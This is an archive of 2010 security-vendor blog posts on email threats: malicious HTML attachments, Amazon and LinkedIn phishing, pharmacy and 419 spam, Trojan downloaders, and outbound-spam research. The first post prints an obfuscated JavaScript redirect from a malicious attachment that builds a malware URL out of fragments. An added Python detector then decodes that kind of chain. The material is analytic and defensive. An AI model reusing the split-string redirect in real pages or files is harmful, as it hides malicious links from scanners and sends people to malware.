Please wait while we infect your computer – more malicious HTML attachments

August 30th, 2010 by Avi Turiel | Category: Email Security

Commtouch labs have detected large volumes of emails with malicious HTML attachments.  The emails purport to come from a range of legitimate sites including:

  • Bell Canada
  • Craigslist
  • NewEgg

So let’s say you read our previous blog about the rise of the malicious HTML attachments.  You open the attached HTML file in a text reader to find the malicious links – but your search for “http” only turns up genuine “newegg.com” links.  Where is the rogue destination link?  We find it hidden in the nasty script – but broken into little pieces:

<script>function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;document.location.href=
String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".ht….."​.substr(0,3)+"ml");
this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";var gK=false;var zA=
new r(); pU='';this.u="u";zA.p();var lK=false;</script>

In other words, the destination is http://tracebook.us/1ht. Opening the HTML file in your browser will automatically redirect you to this link (or a similar one, depending on the file received – in the example below it was http://enjoyyourhaircut.com/…).
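As an added illustration (not from the original post), the following Python script statically reassembles the double-quoted fragments that a script joins with +, applies a trailing .substr() the way the script above does, and flags any reconstructed URL whose host is not on an allowlist of the brands the email claims to come from. The sample attachment, the host bad-example.test and the function names are constructed for this example.

```python
import re

# One double-quoted JS literal, optionally followed by .substr(start, length)
TOKEN = re.compile(r'"([^"\\]*)"(?:\.substr\((\d+),\s*(\d+)\))?')
# Two or more such literals joined by '+' (the pattern used in the script above)
CHAIN = re.compile(
    r'"[^"\\]*"(?:\.substr\(\d+,\s*\d+\))?'
    r'(?:\s*\+\s*"[^"\\]*"(?:\.substr\(\d+,\s*\d+\))?)+'
)
URL_RE = re.compile(r'^https?://([^/\s"]+)', re.IGNORECASE)

def join_chain(chain):
    """Concatenate the literals in one '+' chain, applying JS substr() where present."""
    parts = []
    for lit, start, length in TOKEN.findall(chain):
        if start:  # JS substr(start, length), not substring(start, end)
            lit = lit[int(start):int(start) + int(length)]
        parts.append(lit)
    return "".join(parts)

def extract_split_strings(html):
    """Return every string that was assembled from concatenated fragments."""
    return [join_chain(m.group(0)) for m in CHAIN.finditer(html)]

def host_allowed(host, allowed_domains):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in allowed_domains)

def suspicious_urls(html, allowed_domains):
    """URLs hidden in fragment chains whose host is not an allowlisted brand domain."""
    hits = []
    for s in extract_split_strings(html):
        m = URL_RE.match(s)
        if m and not host_allowed(m.group(1), allowed_domains):
            hits.append(s)
    return hits

# Constructed sample attachment: a genuine-looking brand link plus a redirect
# assembled from fragments, mirroring the structure of the script in the post.
SAMPLE_HTML = '''<a href="http://www.newegg.com/Product">Your order</a>
<script>function r(){};d="";r.prototype={p:function(){this.j='';
document.location.href=String("htt"+"p:/"+"/ba"+"d-e"+"xam"+"ple"+".te"+"st/1"+".htxyz".substr(0,3)+"ml");
}};var zA=new r();zA.p();</script>'''

if __name__ == "__main__":
    for url in suspicious_urls(SAMPLE_HTML, {"newegg.com"}):
        print("hidden redirect:", url)
```

A plain search for "http" finds only the genuine newegg.com link in the sample; the fragment join is what exposes the redirect target.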

Now comes our favorite part.  The screen that greets you next:

4 seconds??  If you’re going to install malware get on with it already…


Spammers Almost Take Our Advice about LinkedIn

August 24th, 2010 by Avi Turiel | Category: Email Security

In February, we “recommended” that cybercriminals save time and money by using LinkedIn as a way to harvest email addresses and details about corporate employees. Instead, they have added LinkedIn to the pantheon of trusted brands being used to scam unaware recipients.

Thanks to the simplicity of the LinkedIn design, spammers have had an easy time of creating faked LinkedIn connection invitations and pending email messages. Check out the images below – one real and two fake.

The spammers did take our advice with regard to one item – they are using the name of a real company in the invitations.  The links in the fake email messages lead to sites with malware as well as pharmacy sites. From the cybercriminals’ perspective, it makes perfect sense to use these links in their attempt to install malware onto unsuspecting computers. What doesn’t seem to make sense, though, is connecting LinkedIn spam to a pharmacy site. Maybe if the real company name they used was a large pharmaceutical company…


Amazon phishing – when username and password is just not enough

August 17th, 2010 by Avi Turiel | Category: phishing

In the grand phishing universe, it’s clear that Amazon would be a target.  This particular phishing outbreak caught our eye though.  It starts with a typical “account verification” email.   Recipients must submit the required information or they will suffer the dreaded “locked account”.

Opening the attached HTML file reveals phishing for more than just a username and password.  The focus instead is on credit card information – a truly comprehensive request for every last detail – even the ATM PIN.

We hope no one filled it in – but those who did and clicked on “continue” would be led to the Amazon homepage.  We note the use of an HTML attachment – when opened, the URL reflects a local file as opposed to a suspicious non-Amazon URL.  But then there is that request for the ATM PIN…


Even Wikipedia and WordPress used for pharmacy spam

August 10th, 2010 by Avi Turiel | Category: Email Security

Perhaps you’ve gotten used to phishing, spam and scams supposedly coming from Facebook, Apple and Google.  Now, though, even trusted brands that we thought were safe are being used in an attempt to get recipients to click the embedded URLs.  Check out the emails below, both related to “recent account opening activity”.

Wikipedia and WordPress, whose low-key designs are imprinted in our consciousness, were recently used in outbreaks spreading pharmacy spam.  Yes, pharmacy spam.  Of course, we’re not exactly sure why they thought our interest in Wikipedia and WordPress would transfer to an interest in low-priced meds.

We aren’t surprised. To be effective, cybercriminals have to gain access to you by leveraging trusted brands that you are exposed to on a daily basis. This means that they must constantly move on, hoping you’ll slip up and click on a link.

So, as usual, continue your vigilance against spam, scams, phishing, and malware from any site, any time, anywhere… (or get a good spam and Web filtering solution).


Silly 419

August 5th, 2010 by Avi Turiel | Category: Spam Favorites

One of the advantages of following us on Twitter is that you get our #Sillyspam posts.  In their efforts to confound mail filters, spammers often need to perform all sorts of language acrobatics.  We usually feel compelled to add a comment to these amusing bits of email – and we summarize our favorites every 3 months in our Trend Report.  A selection from Q2 2010 (the format is “sillyspam” // Commtouch comment):

  • “Are you late for appointments and girls leave you?” // And I thought it was the aftershave!
  • “Our watches don’t wear off like clothes” // but are they tumble-dryer safe?
  • “Make it longer than the Great China Wall!” // Don’t you have something in a medium?
  • “Sold Out  -  LIMITED UNITS WATCHES!” // Sold out!  – what a pity… I would have bought one
  • “contact Him now via e-mail/phone” // No need to go to church/synagogue then?
  • “Your wrist is screaming for a new watch” // My wrist should be more polite
  • “You would may never know” // I might could not understand

And now – we can no longer resist.

Enter: Silly-419.

In their efforts to continually invent new ways of extorting money from the unaware, 419ers need new stories and new names.  Some of these really stretch credibility, or are just… well… silly.  So – every once in a while – we will share our current favorites with you.  First we are reminded of our recent post concerning the “Harry Potter Foundation” as well as Facebook “compensating” users.

Or how about this one:  Freemasons inviting new members by email! From our limited knowledge of the way these things work, it’s not that easy to join up – and we doubt the initial approach is by poorly-worded-email.  Naturally you should “never share this information with anyone”.

Imagine receiving the good news about an unexpected inheritance – and from a guy called “Goodluck” – it’s just too good to be true!

Don’t you think it would be more plausible if you used a name like “Henry Salami”?

More to come…


Email-malware senders guide – Chapter 1

July 26th, 2010 by Avi Turiel | Category: Email Security, malware

Last week we saw an interesting series of emails which seemed to indicate a mid-outbreak change of tactic.  The initial series of emails all had banking and account related themes.  The emails indicated that it was necessary to open an attached document file.  The attachments were actually zipped executable Trojan downloaders.

A Virus-Total (www.virustotal.com) scan showed reasonably high detection rates amongst AV vendors (although we gave them a very generous three days).  At this point we would remind readers about the importance of zero-hour detection as provided by certain products.  Updating signature files many hours after an outbreak will not protect users who receive these attached files before the update has been made available and downloaded.  Note the file size – a relatively large 150KB.

Similar account-themed emails continued to appear over the next 2 days – but this time with an embedded link.  The executable file with an almost identical large file size was again categorized as a Trojan downloader.  Here again we tested the file at Virus Total one day after the outbreak (as above – this is lots of time in outbreak terms) and got a 66% detection rate.

The 150KB file size is shown below.

The conclusion for malware distributors: If at first you don’t succeed – send a link…


Widespread fake Amazon orders lead to PDF malware

July 22nd, 2010 by Avi Turiel | Category: Email Security, Web Security

Well-crafted emails mimicking Amazon order confirmations have been detected in large quantities in the past week.  The Amazon logo and “your account” button actually take image files from the Amazon website.  The email includes twelve links designed to motivate recipients to click:

  • More information about an Amazon Visa card
  • The ordered items are not shown and are linked
  • The identity of “ordered by:” requires a click
  • Perhaps intentionally, the order amounts do not add up, leading a recipient to seek clarification by clicking on the order number
  • The header and footer of the message include “your account”, “Help department”, and “amazon.com” links

The links all lead to short-lived websites hosting malicious pdf files.  The pdf file is executed within an iframe and is therefore launched without user approval.  This final aspect highlights the importance of having a Web security solution to protect users.


HTML attachments – now with malware!

July 21st, 2010 by Avi Turiel | Category: Email Security, malware

In the last few weeks we have detected increasing usage of HTML attachments in a variety of message types – all of them attempting to install malware.  These sorts of attachments are generally not blocked by message scanning systems.  In addition they may arouse less suspicion in users than zipped attachments.

In the examples below, the malware is either in the form of a script within the attached HTML or, more traditionally, leads to a website with some form of malicious script:

  • Youtube friend invitation – includes Trojan downloader within HTML
  • Delivery status notification – includes Trojan downloader within HTML
  • Spam “hot news for you” – leads to a pharmacy website with malware script

Outbound spam? Survey says – Service Providers are looking for a solution

July 9th, 2010 by Eyal Orgil | Category: Data & Research, Outbound Spam

Recently, our service provider customers have become increasingly vocal about the problem of outbound spam, the spam generated within their own networks. We recently sponsored a survey with Osterman Research asking Web hosting companies, ISPs, and email managed service providers how they manage outbound spam.

As you can see from our beautiful chart – service providers are trying a range of methods to stop outbound spam before it becomes inbound spam in someone else’s network.  The chart is taken from the Osterman research report into outbound spam commissioned by Commtouch available for download here: http://www.commtouch.com/outbound-spam-report

These solutions create other issues such as false positives and blocked legitimate users while missing low volume or regional outbound spam (potentially leading to being blocklisted) as shown in the graphic below.

As always, the key is to find an effective solution that creates the ever desirable win-win solution: You save your IP reputation, your customers are happier, and you can appropriately apportion your resources without the additional volume from the zombies and spammers.


Survey Says – Outbound Spam IS Your Problem

July 7th, 2010 by Eyal Orgil | Category: Data & Research, Outbound Spam

Zombies, compromised accounts, and malicious users are just some of the friendly neighborhood spammers on service providers’ networks. Every piece of spam going in AND getting out is your problem, long before it becomes someone else’s.  Commtouch recently commissioned a survey by Osterman Research to determine the state of the industry with regard to outbound spam.

One key finding is that fighting outbound spam is expensive. Sixty-eight percent of service providers are spending up to $100,000 per year on controlling the problem. Four percent are spending more than $250,000.   Fighting outbound spam is important to your customers, too. Eighty-seven percent believe it is important or extremely important for email providers to actively eliminate zombies – a primary source of outbound spam – from their networks.

The research investigates all aspects of the outbound spam problem and is available for download here:   http://www.commtouch.com/outbound-spam-report

Resolving the outbound spam issue also can help service providers to retain customers: our research found that 56% of end users whose outbound email was blocked because of their providers’ outbound spam problem would switch to a provider that would not block innocent users.
